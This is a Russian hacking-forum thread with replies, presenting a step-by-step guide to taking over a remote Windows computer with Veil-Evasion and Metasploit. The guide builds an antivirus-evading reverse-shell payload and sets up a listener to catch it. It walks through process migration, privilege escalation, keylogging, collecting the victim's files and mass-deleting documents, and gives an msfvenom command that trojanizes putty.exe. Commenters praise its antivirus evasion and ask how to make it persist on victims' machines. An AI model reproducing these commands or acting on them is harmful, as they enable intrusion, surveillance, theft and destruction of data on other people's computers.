Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:

thunder

Green Team
08.12.2016
219
26
BIT
0
e.exploit: Ну по поводу слива в virus total я в курсе .Что с veil (криптография),что он.. уже не криптует ...как следует ?
 
B

bussas

Спасибо огромное. Вещь очень хорошая, особенно примечателен постоянный fud. Сэкономил с вами 160$ на покупку криптора.
 
H

hdmoor

Вы можете любой порт сконфигурировать.И не обязательно соединение устанавливать по http , мне допустим больше нравиться https.Что касаемо форматов, то все зависит от вашей фантазии..exe это как один из примеров, можно и bat,js,php,(правда придется использовать другие инструменты и техники) итд.Пентест сводиться не только к закидыванию зловреда жертве,это и соц инженерия , это анализ уязвимостей...
...там как бы вопрос мной профильно ставился - "ворд, пдф?", но сёравно сенкс!
 
A

AlexeyButov

Запускаю payload, он появляется в деспетчере задачь и после разрешения сетевого соединения исчезает. Тоесть зловред удален и кина не будет?
 
O

Olej

Все паблик средства НЕ криптуют как следует.
Тема эта называется "Взлом удаленного ПК ..."
Всем, кто не имеет ещё обстоятельной практики взлома, кто только знакомится с предметом, начинающим... - я бы советовал прежде взлома заглянуть в тему здесь рядом пЫАнЭрам о хакинге.
Чтобы не порождать неоправданных надежд и иллюзий, и, как следствие, досадных разочарований ... "о бесцельно растраченном времени".
Потому что, для начала, ... скажем так: взломать надлежащим образом аккуратно (не что-то сверх супер-пупер!) защищённый компьютер (удалённо) под управлением операционной системы UNIX/Linux - практически невозможно.
 
  • Нравится
Реакции: Vander
A

AlexeyButov

Работает. Но как-то не так. Удалось только выполнить команду ps. При попытке мигрировать в другой процесс доктор веб спалил и удалил зверька, обозвав его DPH:Trojan.lnject.3. Команда getsystem не сработала. Кроме того с мом Metasploit что-то не то, так как при выполнении команды bgrun keylogrecorder выдал лседующие сообщение - This version of Meterpreter is not supported with this Script!

Снимок экрана от 2016-12-31 14-10-19.png
Снимок экрана от 2016-12-31 13-52-07.png
 

Вложения

  • Снимок экрана от 2016-12-31 14-10-19.png
    Снимок экрана от 2016-12-31 14-10-19.png
    140,8 КБ · Просмотры: 497
F

for(i=0;i<225;i++);

Подскажите пожалуйста а возможно ли созданый файл exe..Зделать что бы на компьютаре жертвы запускался вместе с windows???
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Подскажите пожалуйста а возможно ли созданый файл exe..Зделать что бы на компьютаре жертвы запускался вместе с windows???

1) Автозагрузка - существует на всех версиях Windows
2) Прописать в файл самостоятельную автозагрузку с системой после первого запуска
 
  • Нравится
Реакции: Mixa и Vander

thunder

Green Team
08.12.2016
219
26
BIT
0
ghostphisher: Мне как новичку..тоже интересн сий момент. Можно по подробней о втором пункте(что именно надо прописать, нужен ли bat файл) ?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
ghostphisher: Мне как новичку..тоже интересн сий момент. Можно по подробней о втором пункте(что именно надо прописать, нужен ли bat файл) ?

Если собираете исполняемый файл каким либо комбайном для автоматизации, то в нем должна быть такая опция. Если пишем самостоятельно, то пишем не в bat, а пишем в исходный код, который потом компилируем и собираем в исполняемый файл.
 
  • Нравится
Реакции: Mixa

thunder

Green Team
08.12.2016
219
26
BIT
0
ghostphisher: Как легко (улыбнуло) и понятно.. вы ответили (для себя). Для меня это темный лес(улыбнуло) КОМБАЙН для автоматизации ?? В любом случае , спасибо за отклик (ответ). Будем ..читать (изучать) .
 
  • Нравится
Реакции: Mixa

ru5ph3r3

One Level
14.12.2016
2
2
BIT
0
При установке Veil-Evasion на BackBox (базирующейся на Ubuntu 14) выдаёт:

Код:
 [ERROR]: Veil-Evasion is only supported On Ubuntu 15.10 or higher!

Существует простое, не требующее мыслительных процессов — решение. Порядок действий тот же, что и в мануале в шапке темы, но скрипт установки модифицированный.
Клонируем репрозитории с Гитхаба

Код:
sudo su
git clone https://github.com/Veil-Framework/Veil-Evasion.git
git clone https://github.com/Odyssey2247/veil4backbox.git

Переходим в каталог veil4backbox и делаем скрипт setup-backbox.sh исполняемым

Код:
cd veil4backbox
chmod +x setup-backbox.sh

Перемещаем скрипт по пути Veil-Evasion/setup, заходим в setup, запускаем модифицированный вариант установочного скрипта

Код:
mv setup-backbox.sh ~/Veil-Evasion/setup
cd ~/Veil-Evasion/setup
./setup-backbox.sh

Может кому-то пригодится.
 
  • Нравится
Реакции: Сергей Попов

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
ghostphisher: Как легко (улыбнуло) и понятно.. вы ответили (для себя). Для меня это темный лес(улыбнуло) КОМБАЙН для автоматизации ?? В любом случае , спасибо за отклик (ответ). Будем ..читать (изучать) .

Комбайном я назвал утилиту, подобную Veil-Evasion, где надо только выбрать нужные пункты. Самым простым были билдеры первые, например от трояна Pinch

1_PinchHTTP.JPG


Как видим, там можно было выбрать Автозапуск и маскировку под сервис. На выходе мы получаем исполняемый файл, который будет сам стартовать каждый раз под видом некого сервиса.
 
  • Нравится
Реакции: Mixa, paragon21 и thunder

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Подскажите пожалуйста а возможно ли созданый файл exe..Зделать что бы на компьютаре жертвы запускался вместе с windows???
конечно...здесь на форуме даже гайд по этому поводу был,
Vander делал его..Как вариант можете еще так:

 
  • Нравится
Реакции: thunder и ghostphisher

masxter

New member
31.12.2016
4
0
BIT
0
Вейл тема вообще жесткая, палится только 4-мя антивирусами на данный момент.
 

thunder

Green Team
08.12.2016
219
26
BIT
0
Комбайном я назвал утилиту, подобную Veil-Evasion, где надо только выбрать нужные пункты. Самым простым были билдеры первые, например от трояна Pinch

1_PinchHTTP.JPG


Как видим, там можно было выбрать Автозапуск и маскировку под сервис. На выходе мы получаем исполняемый файл, который будет сам стартовать каждый раз под видом некого сервиса.
Какие сейчас комбайны актуальны (более новые ). Комбайны ... не создают проблем с палевностью антивирусами (как антивирусы реагируют на файл обработанный в комбайна) ?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Какие сейчас комбайны актуальны (более новые ).?

Тот же Veil. И надо не забывать про крипторы, протекторы. Надо понимать - времена закинуть exe или bat собранные за 1 минуту виндовым билдером прошли. Сейчас почтовые сервисы на стадии пересылки писем детектят малварь.
 
  • Нравится
Реакции: thunder

thunder

Green Team
08.12.2016
219
26
BIT
0
ghostphisher: Вы уж простите меня ..за глупые вопросы . Veil.. есть комбайн (есть ли какой нибудь мануал, как пользоваться комбайном в veil-evasion ) ? Протекторы (сколько много открытий для себя ) ? Лишней раз (улыбнуло) убеждаюсь ,как я зелен ..
[doublepost=1483367499,1483357063][/doublepost]
конечно...здесь на форуме даже гайд по этому поводу был,
Vander делал его..Как вариант можете еще так:

[doublepost=1483371209][/doublepost]В чем проблема ?
 
Последнее редактирование модератором:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!